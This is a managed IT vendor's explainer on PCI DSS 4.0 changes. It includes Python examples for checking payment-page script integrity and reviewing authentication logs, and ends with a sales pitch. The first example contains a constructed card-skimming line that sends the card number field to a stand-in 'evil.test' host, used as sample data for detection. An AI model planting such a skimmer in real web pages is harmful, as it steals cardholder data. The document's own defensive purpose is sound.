The Payment Card Industry Data Security Standard

Many Stratix Systems clients accept credit and debit cards in their work, so we want to update you on the latest data security thinking for the Payment Card Industry.

The Payment Card Industry Data Security Standard (PCI DSS) is a set of security requirements designed to protect credit and debit cardholder data. It is maintained by the PCI Security Standards Council, which was founded by the five major payment card brands: Visa, MasterCard, American Express, Discover, and JCB International. The latest version of the standard, PCI DSS 4.0, was released in March 2022.

Changes to PCI DSS – PCI DSS 4.0

PCI DSS 4.0 introduces several changes and updates to the existing requirements, with a particular focus on addressing evolving threats to payment card security. Here are some of the key changes that organizations should be aware of:

Increased focus on risk management

PCI DSS 4.0 places a greater emphasis on risk management, requiring organizations to implement more robust risk assessment processes. In the past, wherever the standard said ‘periodic’ there was no defined timeframe. Now the entity must perform and document a ‘targeted risk analysis’ for each such requirement, defining how often the activity is carried out and justifying that frequency.

Enhanced requirements for authentication

PCI DSS 4.0 places a greater emphasis on the use of multi-factor authentication (MFA) to protect against credential theft and phishing attacks. Under the previous version, MFA was required for non-console administrative access to the cardholder data environment (CDE) and for remote access into the network; 4.0 extends it to all access into the CDE, for all personnel. Where a user could previously complete MFA once at the network perimeter and then move into the CDE without a further challenge, a separate MFA step is now required at the point where the cardholder data (CHD) actually resides.

Expanded scope

Each entity must now confirm and document the scope of its cardholder data environment at least once every 12 months, and again whenever there is a significant change to the in-scope environment.

Strengthened web application requirements

Public-facing payment applications must be protected by an automated technical solution such as a web application firewall (WAF) that detects and prevents web-based attacks. In addition, every script loaded on a payment page must be inventoried, authorized, and integrity-checked, and a change- and tamper-detection mechanism must alert personnel to unauthorized modification of the HTTP headers and content of the payment page as received by the consumer’s browser. This applies even if the payment page, or the scripts on it, are delivered by a third party.
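The following is an added example, not code from Stratix Systems or from the PCI Security Standards Council, showing the two payment-page checks described above in one script: a script inventory with Subresource Integrity (SRI) verification, and a header-plus-body fingerprint for change detection. The page HTML, the script bodies, the URLs and the inventory are constructed sample data; the function names are this example’s own.

```python
import base64
import hashlib
import re

# Constructed authorized inventory for the payment page: URL -> business
# justification. Any script outside this list is unauthorized.
AUTHORIZED_SCRIPTS = {
    "https://js.example-psp.test/v3/checkout.js": "payment service provider SDK",
    "https://cdn.example.test/assets/app.js": "first-party checkout UI",
}

# Constructed script bodies as the browser would receive them. The third is
# a skimmer that a compromised CDN or an injected tag might deliver.
SCRIPT_BODIES = {
    "https://js.example-psp.test/v3/checkout.js": b"window.PSP={tokenize:function(c){}};",
    "https://cdn.example.test/assets/app.js": b"document.getElementById('pay').onclick=submit;",
    "https://tracker.evil.test/skim.js": b"new Image().src='//evil.test/?c='+document.forms[0].pan.value;",
}

def sri_hash(body: bytes) -> str:
    """Subresource Integrity value (sha384, base64) for a script body."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')

def extract_scripts(html: str):
    """Yield (src, integrity) for every external <script> tag in the page."""
    for m in SCRIPT_TAG.finditer(html):
        attrs = dict(ATTR.findall(m.group(1)))
        if "src" in attrs:
            yield attrs["src"], attrs.get("integrity")

def audit_payment_page(html, bodies=SCRIPT_BODIES, inventory=AUTHORIZED_SCRIPTS):
    """Return findings as (kind, src) tuples. An empty list means the page
    loads only inventoried scripts whose content matches their SRI hash."""
    findings = []
    for src, integrity in extract_scripts(html):
        if src not in inventory:
            findings.append(("unauthorized_script", src))
        elif integrity is None:
            findings.append(("missing_integrity", src))
        elif integrity != sri_hash(bodies.get(src, b"")):
            findings.append(("integrity_mismatch", src))
    return findings

def page_fingerprint(headers: dict, html: str) -> str:
    """Hash the security-relevant response headers plus the page body.
    Storing this at deployment time and comparing on every check is a
    simple change-detection mechanism: any difference should raise an alert."""
    h = hashlib.sha256()
    for name in sorted(headers, key=str.lower):
        if name.lower() in ("content-security-policy", "strict-transport-security", "x-frame-options"):
            h.update(f"{name.lower()}: {headers[name]}\n".encode())
    h.update(html.encode())
    return h.hexdigest()

def script_tag(src):
    """Build a <script> tag with the correct SRI value for a known body."""
    return f'<script src="{src}" integrity="{sri_hash(SCRIPT_BODIES[src])}" crossorigin="anonymous"></script>'

# Constructed baseline page and a tampered copy with an injected skimmer tag.
HEADERS = {
    "Content-Security-Policy": "script-src 'self' https://js.example-psp.test",
    "Strict-Transport-Security": "max-age=31536000",
}
BASELINE_PAGE = (
    '<html><body><form id="checkout">...</form>'
    + script_tag("https://js.example-psp.test/v3/checkout.js")
    + script_tag("https://cdn.example.test/assets/app.js")
    + "</body></html>"
)
TAMPERED_PAGE = BASELINE_PAGE.replace(
    "</body>", '<script src="https://tracker.evil.test/skim.js"></script></body>'
)

if __name__ == "__main__":
    baseline = page_fingerprint(HEADERS, BASELINE_PAGE)
    print("baseline findings:", audit_payment_page(BASELINE_PAGE))
    print("tampered findings:", audit_payment_page(TAMPERED_PAGE))
    print("page changed:", page_fingerprint(HEADERS, TAMPERED_PAGE) != baseline)
```

In practice the script bodies and the page are fetched from the live site the way a customer’s browser would see them, and the fingerprint is compared against the value recorded when the page was last approved, so that a change to the CSP header, to a script’s content, or to the set of scripts on the page each produces an alert.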

Other tightened requirements

Daily audit log reviews must be performed with automated mechanisms rather than by a person reading logs manually. Internal vulnerability scans must be authenticated scans. Passwords must now be at least 12 characters instead of 7 (8 is permitted only where a system cannot support 12). Changing passwords every 90 days is only required where a password is the sole authentication factor; where MFA is used, or where the account’s security posture is analysed dynamically, rotation on a fixed schedule is no longer required. These are a few examples among many.
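To make the automated log review requirement concrete, here is an added example (not Stratix Systems’ code) that runs a small set of detection rules over constructed authentication log lines: a burst of failed logins from one source, a successful login following such a burst, and an audit log being cleared. The log format, host names, thresholds and rule names are assumptions made for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample lines in an assumed "timestamp host event user src" format.
SAMPLE_LOG = """\
2024-05-01T02:14:03Z cde-db01 auth_fail svc_backup 10.20.30.7
2024-05-01T02:14:09Z cde-db01 auth_fail svc_backup 10.20.30.7
2024-05-01T02:14:15Z cde-db01 auth_fail svc_backup 10.20.30.7
2024-05-01T02:14:21Z cde-db01 auth_fail svc_backup 10.20.30.7
2024-05-01T02:14:27Z cde-db01 auth_fail svc_backup 10.20.30.7
2024-05-01T02:14:40Z cde-db01 auth_ok svc_backup 10.20.30.7
2024-05-01T09:01:11Z cde-app01 auth_fail jsmith 10.20.31.12
2024-05-01T09:01:40Z cde-app01 auth_ok jsmith 10.20.31.12
2024-05-01T11:30:00Z cde-db01 audit_log_cleared root 10.20.30.5
"""

LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")
FAIL_THRESHOLD = 5                 # assumed: failures that count as a burst
FAIL_WINDOW = timedelta(minutes=10)  # assumed: sliding window for the burst

def parse(log_text):
    """Parse log lines into (timestamp, host, event, user, src) tuples."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # malformed line; a real reviewer would count these too
        ts, host, event, user, src = m.groups()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, event, user, src))
    return events

def review(log_text):
    """Return alerts as (rule, host, user, src) tuples, in log order."""
    alerts = []
    recent_fails = defaultdict(list)  # (host, user, src) -> failure timestamps in window
    bursts = set()                    # keys that have already tripped the burst rule
    for ts, host, event, user, src in parse(log_text):
        key = (host, user, src)
        if event == "auth_fail":
            window = recent_fails[key]
            window.append(ts)
            while window and ts - window[0] > FAIL_WINDOW:
                window.pop(0)  # drop failures older than the window
            if len(window) >= FAIL_THRESHOLD and key not in bursts:
                bursts.add(key)
                alerts.append(("brute_force", host, user, src))
        elif event == "auth_ok":
            if key in bursts:
                alerts.append(("success_after_burst", host, user, src))
            recent_fails[key].clear()
        elif event == "audit_log_cleared":
            alerts.append(("audit_log_cleared", host, user, src))
    return alerts

if __name__ == "__main__":
    for alert in review(SAMPLE_LOG):
        print(alert)
```

A production log review would read from the centralized log store the standard requires, cover every in-scope system component, and record that the review ran and what it found, since the evidence of the review is itself something an assessor will ask for.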

Greater transparency and flexibility

The new version of the standard includes more detailed guidance on how to meet each requirement, while also allowing more flexibility in how organizations achieve compliance: alongside the traditional defined approach, a ‘customized approach’ lets an organization meet a requirement’s stated objective with controls of its own design, validated by its assessor. This is intended to make compliance more achievable for organizations with limited resources or unique business models.

What does it mean for organizations that accept credit and debit cards in their work?

Taken together, PCI DSS 4.0 is a significant update to the existing standard that reflects the evolving threat landscape and changing payment ecosystem. Organizations that handle cardholder data must understand the new requirements and ensure that they follow the updated standard. The standard becomes mandatory on 1 April 2024, when version 3.2.1 is retired, but many of the new requirements are best practice only until 31 March 2025, after which they are mandatory as well. Failure to comply with PCI DSS 4.0 can result in significant fines and reputational damage, so it is critical that organizations take the necessary steps to protect cardholder data and maintain compliance with the latest version of the standard.

And this is where Stratix Systems can help.

Stratix Systems is one of the region’s leading technology solutions partners—with the people, resources and experience to deliver the Managed IT, cybersecurity, document management and imaging support you need: where, when and how you need it. The best practices, the most road-tested options, and the best technologies. Backed by knowledgeable people and the most responsive client and technical support in the business.

Stratix Systems offers clients a robust assortment of flexible, secure managed IT, cybersecurity, and document management solutions, as well as imaging and printing technologies to help protect you from hacks and attacks and support administrative workflows – all with significant cost savings that work with even the tightest of budgets. And of course, we provide knowledgeable tech support every step of the way.

So, if IT and cybersecurity issues are keeping you up at night, it’s time to talk with Stratix Systems. Call 800-444-2943 or visit stratixsystems.com to learn more about how we can help.
